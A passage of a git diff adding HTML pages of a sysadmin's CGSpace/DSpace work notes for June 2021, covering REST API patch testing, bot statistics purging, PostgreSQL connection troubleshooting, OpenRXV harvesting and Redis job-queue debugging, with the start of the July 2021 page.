+<li>I confirmed the issue on the current DSpace 6 Demo:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length
+</span></span><span style="display:flex;"><span>5
+</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span>
+</span></span><span style="display:flex;"><span>&#34;10673/4&#34;
+</span></span><span style="display:flex;"><span>&#34;10673/3&#34;
+</span></span><span style="display:flex;"><span>&#34;10673/6&#34;
+</span></span><span style="display:flex;"><span>&#34;10673/5&#34;
+</span></span><span style="display:flex;"><span>&#34;10673/7&#34;
+</span></span><span style="display:flex;"><span># log into DSpace Demo XMLUI as admin and make one item private <span style="color:#f92672">(</span><span style="color:#66d9ef">for</span> example 10673/6<span style="color:#f92672">)</span>
+</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq length       
+</span></span><span style="display:flex;"><span>4
+</span></span><span style="display:flex;"><span>$ curl -s -H <span style="color:#e6db74">&#34;Accept: application/json&#34;</span> <span style="color:#e6db74">&#34;https://demo.dspace.org/rest/items?offset=0&amp;limit=5&#34;</span> | jq <span style="color:#e6db74">&#39;.[].handle&#39;</span> 
+</span></span><span style="display:flex;"><span>&#34;10673/4&#34;
+</span></span><span style="display:flex;"><span>&#34;10673/3&#34;
+</span></span><span style="display:flex;"><span>&#34;10673/5&#34;
+</span></span><span style="display:flex;"><span>&#34;10673/7&#34;
+</span></span></code></pre></div><ul>
+<li>I tested the pull request on DSpace Test and it works, so I left a note on GitHub and Jira</li>
+<li>Last week I noticed that the Gender Platform website is using &ldquo;cgspace.cgiar.org&rdquo; links for CGSpace, instead of handles
+<ul>
+<li>I emailed Fabio and Marianne to ask them to please use the Handle links</li>
+</ul>
+</li>
+<li>I tested the <a href="https://github.com/DSpace/DSpace/pull/2543">pull request for DS-4271</a> where Discovery filters of type &ldquo;contains&rdquo; don&rsquo;t work as expected when the user&rsquo;s search term has spaces
+<ul>
+<li>I tested with filter &ldquo;farmer managed irrigation systems&rdquo; on DSpace Test</li>
+<li>Before the patch I got 293 results, and the few I checked didn&rsquo;t have the expected metadata value</li>
+<li>After the patch I got 162 results, and all the items I checked had the exact metadata value I was expecting</li>
+</ul>
+</li>
+<li>I tested a fresh harvest from my local AReS on DSpace Test with the DS-4065 REST API patch and here are my results:
+<ul>
+<li>90459 in final from last harvesting</li>
+<li>90307 in temp after new harvest</li>
+<li>90327 in temp after start plugins</li>
+</ul>
+</li>
+<li>The 90327 number seems closer to the &ldquo;real&rdquo; number of items on CGSpace&hellip;
+<ul>
+<li>Seems close, but not entirely correct yet:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | wc -l
+</span></span><span style="display:flex;"><span>90327
+</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;[[:digit:]]+/[[:digit:]]+&#34;&#39;</span> openrxv-items_data-local-ds-4065.json | sort -u | wc -l
+</span></span><span style="display:flex;"><span>90317
+</span></span></code></pre></div><h2 id="2021-06-22">2021-06-22</h2>
+<ul>
+<li>Make a <a href="https://github.com/atmire/COUNTER-Robots/pull/43">pull request</a> to the COUNTER-Robots project to add two new user agents: crusty and newspaper
+<ul>
+<li>These two bots have made ~3,000 requests on CGSpace</li>
+<li>Then I added them to our local bot override in CGSpace (until the above pull request is merged) and ran my bot checking script:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p   
+</span></span><span style="display:flex;"><span>Purging 1339 hits from RI\/1\.0 in statistics
+</span></span><span style="display:flex;"><span>Purging 447 hits from crusty in statistics
+</span></span><span style="display:flex;"><span>Purging 3736 hits from newspaper in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 5522
+</span></span></code></pre></div><ul>
+<li>Surprised to see RI/1.0 in there because it&rsquo;s been in the override file for a while</li>
+<li>Looking at the 2021 statistics in Solr I see a few more suspicious user agents:
+<ul>
+<li><code>PostmanRuntime/7.26.8</code></li>
+<li><code>node-fetch/1.0 (+https://github.com/bitinn/node-fetch)</code></li>
+<li><code>Photon/1.0</code></li>
+<li><code>StatusCake_Pagespeed_indev</code></li>
+<li><code>node-superagent/3.8.3</code></li>
+<li><code>cortex/1.0</code></li>
+</ul>
+</li>
+<li>These bots account for ~42,000 hits in our statistics&hellip; I will just purge them and add them to our local override, but I can&rsquo;t be bothered to submit them to COUNTER-Robots since I&rsquo;d have to look up the information for each one</li>
+<li>I re-synced DSpace Test (linode26) with the assetstore, Solr statistics, and database from CGSpace (linode18)</li>
+</ul>
+<h2 id="2021-06-23">2021-06-23</h2>
+<ul>
+<li>I woke up this morning to find CGSpace down
+<ul>
+<li>The logs show a high number of abandoned PostgreSQL connections and locks:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># journalctl --since<span style="color:#f92672">=</span>today -u tomcat7 | grep -c <span style="color:#e6db74">&#39;Connection has been abandoned&#39;</span>
+</span></span><span style="display:flex;"><span>978
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>10100
+</span></span></code></pre></div><ul>
+<li>I sent a message to Atmire, hoping that the database logging stuff they put in place last time this happened will be of help now</li>
+<li>In the mean time, I decided to upgrade Tomcat from 7.0.107 to 7.0.109, and the PostgreSQL JDBC driver from 42.2.20 to 42.2.22 (first on DSpace Test)</li>
+<li>I also applied the following patches from the 6.4 milestone to our <code>6_x-prod</code> branch:
+<ul>
+<li>DS-4065: resource policy aware REST API hibernate queries</li>
+<li>DS-4271: Replaced brackets with double quotes in SolrServiceImpl</li>
+</ul>
+</li>
+<li>After upgrading and restarting Tomcat the database connections and locks were back down to normal levels:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>63
+</span></span></code></pre></div><ul>
+<li>Looking in the DSpace log, the first &ldquo;pool empty&rdquo; message I saw this morning was at 4AM:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-06-23 04:01:14,596 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ [http-bio-127.0.0.1-8443-exec-4323] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
+</span></span></code></pre></div><ul>
+<li>Oh, and I notice 8,000 hits from a Flipboard bot using this user-agent:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)
+</span></span></code></pre></div><ul>
+<li>We can purge them, as this is not user traffic: <a href="https://about.flipboard.com/browserproxy/">https://about.flipboard.com/browserproxy/</a>
+<ul>
+<li>I will add it to our local user agent pattern file and eventually submit a pull request to COUNTER-Robots</li>
+</ul>
+</li>
+<li>I merged <a href="https://github.com/ilri/OpenRXV/pull/96">Moayad&rsquo;s health check pull request in AReS</a> and I will deploy it on the production server soon</li>
+</ul>
+<h2 id="2021-06-24">2021-06-24</h2>
+<ul>
+<li>I deployed the new OpenRXV code on CGSpace but I&rsquo;m having problems with the indexing, something about missing the mappings on the <code>openrxv-items-temp</code> index
+<ul>
+<li>I extracted the mappings from my local instance using <code>elasticdump</code> and after putting them on CGSpace I was able to harvest&hellip;</li>
+<li>But still, there are way too many duplicates and I&rsquo;m not sure what the actual number of items should be</li>
+<li>According to the OAI ListRecords for each of our repositories, we should have about:
+<ul>
+<li>MELSpace: 9537</li>
+<li>WorldFish: 4483</li>
+<li>CGSpace: 91305</li>
+<li>Total: 105325</li>
+</ul>
+</li>
+<li>Looking at the last backup I have from harvesting before these changes we have 104,000 total handles, but only 99186 unique:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | wc -l
+</span></span><span style="display:flex;"><span>104797
+</span></span><span style="display:flex;"><span>$ grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> cgspace-openrxv-items-temp-backup.json | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>99186
+</span></span></code></pre></div><ul>
+<li>This number is probably unique for that particular harvest, but I don&rsquo;t think it represents the true number of items&hellip;</li>
+<li>The harvest of DSpace Test I did on my local test instance yesterday has about 91,000 items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;&#34;repo&#34;:&#34;DSpace Test&#34;&#39;</span> 2021-06-23-openrxv-items-final-local.json | grep -oE <span style="color:#e6db74">&#39;&#34;handle&#34;:&#34;([[:digit:]]|\.)+/[[:digit:]]+&#34;&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>90990
+</span></span></code></pre></div><ul>
+<li>So the harvest on the live site is missing items, then why didn&rsquo;t the add missing items plugin find them?!
+<ul>
+<li>I notice that we are missing the <code>type</code> in the metadata structure config for each repository on the production site, and we are using <code>type</code> for item type in the actual schema&hellip; so maybe there is a conflict there</li>
+<li>I will rename type to <code>item_type</code> and add it back to the metadata structure</li>
+<li>The add missing items definitely checks this field&hellip;</li>
+<li>I modified my local backup to add <code>type: item</code> and uploaded it to the temp index on production</li>
+<li>Oh! nginx is blocking OpenRXV&rsquo;s attempt to read the sitemap:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>172.104.229.92 - - [24/Jun/2021:07:52:58 +0200] &#34;GET /sitemap HTTP/1.1&#34; 503 190 &#34;-&#34; &#34;OpenRXV harvesting bot; https://github.com/ilri/OpenRXV&#34;
+</span></span></code></pre></div><ul>
+<li>I fixed nginx so it always allows people to get the sitemap and then re-ran the plugins&hellip; now it&rsquo;s checking 180,000+ handles to see if they are collections or items&hellip;
+<ul>
+<li>I see it fetched the sitemap three times, we need to make sure it&rsquo;s only doing it once for each repository</li>
+</ul>
+</li>
+<li>According to the api logs we will be adding 5,697 items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker logs api 2&gt;/dev/null | grep dspace_add_missing_items | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>5697
+</span></span></code></pre></div><ul>
+<li>Spent a few hours with Moayad troubleshooting and improving OpenRXV
+<ul>
+<li>We found a bug in the harvesting code that can occur when you are harvesting DSpace 5 and DSpace 6 instances, as DSpace 5 uses numeric (long) IDs, and DSpace 6 uses UUIDs</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-06-25">2021-06-25</h2>
+<ul>
+<li>The new OpenRXV code creates almost 200,000 jobs when the plugins start
+<ul>
+<li>I figured out how to use <a href="https://github.com/bee-queue/arena/tree/master/example">bee-queue/arena</a> to view our Bull job queue</li>
+<li>Also, we can see the jobs directly using redis-cli:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ redis-cli
+</span></span><span style="display:flex;"><span>127.0.0.1:6379&gt; SCAN 0 COUNT 5
+</span></span><span style="display:flex;"><span>1) &#34;49152&#34;
+</span></span><span style="display:flex;"><span>2) 1) &#34;bull:plugins:476595&#34;
+</span></span><span style="display:flex;"><span>   2) &#34;bull:plugins:367382&#34;
+</span></span><span style="display:flex;"><span>   3) &#34;bull:plugins:369228&#34;
+</span></span><span style="display:flex;"><span>   4) &#34;bull:plugins:438986&#34;
+</span></span><span style="display:flex;"><span>   5) &#34;bull:plugins:366215&#34;
+</span></span></code></pre></div><ul>
+<li>We can apparently get the names of the jobs in each hash using <code>hget</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>127.0.0.1:6379&gt; TYPE bull:plugins:401827
+</span></span><span style="display:flex;"><span>hash
+</span></span><span style="display:flex;"><span>127.0.0.1:6379&gt; HGET bull:plugins:401827 name
+</span></span><span style="display:flex;"><span>&#34;dspace_add_missing_items&#34;
+</span></span></code></pre></div><ul>
+<li>I whipped up a one liner to get the keys for all plugin jobs, convert to redis <code>HGET</code> commands to extract the value of the name field, and then sort them by their counts:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ redis-cli KEYS <span style="color:#e6db74">&#34;bull:plugins:*&#34;</span> <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | sed -e &#39;s/^bull/HGET bull/&#39; -e &#39;s/\([[:digit:]]\)$/\1 name/&#39; \
+</span></span><span style="display:flex;"><span>  | ncat -w 3 localhost 6379 \
+</span></span><span style="display:flex;"><span>  | grep -v -E &#39;^\$&#39; | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>      3 dspace_health_check
+</span></span><span style="display:flex;"><span>      4 -ERR wrong number of arguments for &#39;hget&#39; command
+</span></span><span style="display:flex;"><span>     12 mel_downloads_and_views
+</span></span><span style="display:flex;"><span>    129 dspace_altmetrics
+</span></span><span style="display:flex;"><span>    932 dspace_downloads_and_views
+</span></span><span style="display:flex;"><span> 186428 dspace_add_missing_items
+</span></span></code></pre></div><ul>
+<li>Note that this uses <code>ncat</code> to send commands directly to redis all at once instead of one at a time (<code>netcat</code> didn&rsquo;t work here, as it doesn&rsquo;t know when our input is finished and never quits)
+<ul>
+<li>I thought of using <code>redis-cli --pipe</code> but then you have to construct the commands in the redis protocol format with the number of args and length of each command</li>
+</ul>
+</li>
+<li>There is clearly something wrong with the new DSpace health check plugin, as it creates WAY too many jobs every time we run the plugins</li>
+</ul>
+<h2 id="2021-06-27">2021-06-27</h2>
+<ul>
+<li>Looking into the spike in PostgreSQL connections last week
+<ul>
+<li>I see the same things that I always see (large number of connections waiting for lock, large number of threads, high CPU usage, etc), but I also see almost 10,000 DSpace sessions on 2021-06-25</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2021/06/dspace-sessions-week.png" alt="DSpace sessions"></p>
+<ul>
+<li>Looking at the DSpace log I see there was definitely a higher number of sessions that day, perhaps twice the normal:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">for</span> file in dspace.log.2021-06-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*; <span style="color:#66d9ef">do</span> echo <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span>; grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}&#39;</span> <span style="color:#e6db74">&#34;</span>$file<span style="color:#e6db74">&#34;</span> | sort | uniq | wc -l; <span style="color:#66d9ef">done</span>
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-10
+</span></span><span style="display:flex;"><span>19072
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-11
+</span></span><span style="display:flex;"><span>19224
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-12
+</span></span><span style="display:flex;"><span>19215
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-13
+</span></span><span style="display:flex;"><span>16721
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-14
+</span></span><span style="display:flex;"><span>17880
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-15
+</span></span><span style="display:flex;"><span>12103
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-16
+</span></span><span style="display:flex;"><span>4651
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-17
+</span></span><span style="display:flex;"><span>22785
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-18
+</span></span><span style="display:flex;"><span>21406
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-19
+</span></span><span style="display:flex;"><span>25967
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-20
+</span></span><span style="display:flex;"><span>20850
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-21
+</span></span><span style="display:flex;"><span>6388
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-22
+</span></span><span style="display:flex;"><span>5945
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-23
+</span></span><span style="display:flex;"><span>46371
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-24
+</span></span><span style="display:flex;"><span>9024
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-25
+</span></span><span style="display:flex;"><span>12521
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-26
+</span></span><span style="display:flex;"><span>16163
+</span></span><span style="display:flex;"><span>dspace.log.2021-06-27
+</span></span><span style="display:flex;"><span>5886
+</span></span></code></pre></div><ul>
+<li>I see 15,000 unique IPs in the XMLUI logs alone on that day:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.4.gz | grep <span style="color:#e6db74">&#39;23/Jun/2021&#39;</span> | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>15835
+</span></span></code></pre></div><ul>
+<li>Annoyingly I found 37,000 more hits from Bing using <code>dns:*msnbot* AND dns:*.msn.com.</code> as a Solr filter
+<ul>
+<li>WTF, they are using a normal user agent: <code>Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko</code></li>
+<li>I will purge the IPs and add this user agent to the nginx config so that we can rate limit it</li>
+</ul>
+</li>
+<li>I signed up for Bing Webmaster Tools and verified cgspace.cgiar.org with the BingSiteAuth.xml file
+<ul>
+<li>Also I adjusted the nginx config to explicitly allow access to <code>robots.txt</code> even when bots are rate limited</li>
+<li>Also I found that Bing was auto discovering all our RSS and Atom feeds as &ldquo;sitemaps&rdquo; so I deleted 750 of them and submitted the real sitemap</li>
+<li>I need to see if I can adjust the nginx config further to map the <code>bot</code> user agent to DNS like msnbot&hellip;</li>
+</ul>
+</li>
+<li>Review Abdullah&rsquo;s filter on click pull request
+<ul>
+<li>I rebased his code on the latest master branch and tested adding filter on click to the map and list components, and it works fine</li>
+<li>There seems to be a bug that breaks scrolling on the page though&hellip;</li>
+<li>Abdullah fixed the bug in the filter on click branch</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-06-28">2021-06-28</h2>
+<ul>
+<li>Some work on OpenRXV
+<ul>
+<li>Integrate <code>prettier</code> into the frontend and backend and format everything on the <code>master</code> branch</li>
+<li>Re-work the GitHub Actions workflow for frontend and add one for backend</li>
+<li>The workflows run <code>npm install</code> to test dependencies, and <code>npm ci</code> with <code>prettier</code> to check formatting</li>
+<li>Also I merged Abdallah&rsquo;s filter on click pull request</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-06-30">2021-06-30</h2>
+<ul>
+<li>CGSpace is showing a blank white page&hellip;
+<ul>
+<li>The status is HTTP 200, but it&rsquo;s blank white&hellip; so UptimeRobot didn&rsquo;t send a notification!</li>
+</ul>
+</li>
+<li>The DSpace log shows:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2021-06-30 08:19:15,874 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ Cannot get a connection, pool error Timeout waiting for idle object
+</span></span></code></pre></div><ul>
+<li>The first one of these I see is from last night at 2021-06-29 at 10:47 PM</li>
+<li>I restarted Tomcat 7 and CGSpace came back up&hellip;</li>
+<li>I didn&rsquo;t see that Atmire had responded last week (on 2021-06-23) about the issues we had
+<ul>
+<li>He said they had to do the same thing that they did last time: switch to the postgres user and kill all activity</li>
+<li>He said they found tons of connections to the REST API, like 3-4 per second, and asked if that was normal</li>
+<li>I pointed him to our Tomcat server.xml configuration, saying that we purposefully isolated the Tomcat connection pools between the API and XMLUI for this purpose&hellip;</li>
+</ul>
+</li>
+<li>Export a list of all CGSpace&rsquo;s AGROVOC keywords with counts for Enrico and Elizabeth Arnaud to discuss with AGROVOC:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value AS &#34;dcterms.subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 187 GROUP BY &#34;dcterms.subject&#34; ORDER BY count DESC) to /tmp/2021-06-30-agrovoc.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 20780
+</span></span></code></pre></div><ul>
+<li>Actually Enrico wanted NON AGROVOC, so I extracted all the center and CRP subjects (ignoring system office and themes):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242) GROUP BY subject ORDER BY count DESC) to /tmp/2021-06-30-non-agrovoc.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 1710
+</span></span></code></pre></div><ul>
+<li>Fix an issue in the Ansible infrastructure playbooks for the DSpace role
+<ul>
+<li>It was causing the template module to fail when setting up the npm environment</li>
+<li>We needed to install <code>acl</code> so that Ansible can use <code>setfacl</code> on the target file before becoming an unprivileged user</li>
+</ul>
+</li>
+<li>I saw a strange message in the Tomcat 7 journal on DSpace Test (linode26):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>Jun 30 16:00:09 linode26 tomcat7[30294]: WARNING: Creation of SecureRandom instance for session ID generation using [SHA1PRNG] took [111,733] milliseconds.
+</span></span></code></pre></div><ul>
+<li>What&rsquo;s even crazier is that it is twice that on CGSpace (linode18)!</li>
+<li>Apparently OpenJDK defaults to using <code>/dev/random</code> (see <code>/etc/java-8-openjdk/security/java.security</code>):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>securerandom.source=file:/dev/urandom
+</span></span></code></pre></div><ul>
+<li><code>/dev/random</code> blocks and can take a long time to get entropy, and urandom on modern Linux is a cryptographically secure pseudorandom number generator
+<ul>
+<li>Now Tomcat starts much faster and no warning is printed so I&rsquo;m going to add this to our Ansible infrastructure playbooks</li>
+</ul>
+</li>
+<li>Interesting resource about the lore behind the <code>/dev/./urandom</code> workaround that is posted all over the Internet, apparently due to a bug in early JVMs: <a href="https://bugs.java.com/bugdatabase/view_bug.do?bug_id=6202721">https://bugs.java.com/bugdatabase/view_bug.do?bug_id=6202721</a></li>
+<li>I&rsquo;m experimenting with using PgBouncer for pooling instead of Tomcat&rsquo;s JDBC</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-07/index.html b/docs/2021-07/index.html
new file mode 100644
index 000000000..dc78a880c
--- /dev/null
+++ b/docs/2021-07/index.html
@@ -0,0 +1,769 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="July, 2021" />
+<meta property="og:description" content="2021-07-01
+
+Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
+
+localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
+COPY 20994
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-07/" />
+<meta property="article:published_time" content="2021-07-01T08:53:07+03:00" />
+<meta property="article:modified_time" content="2021-08-01T16:19:05+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="July, 2021"/>
+<meta name="twitter:description" content="2021-07-01
+
+Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:
+
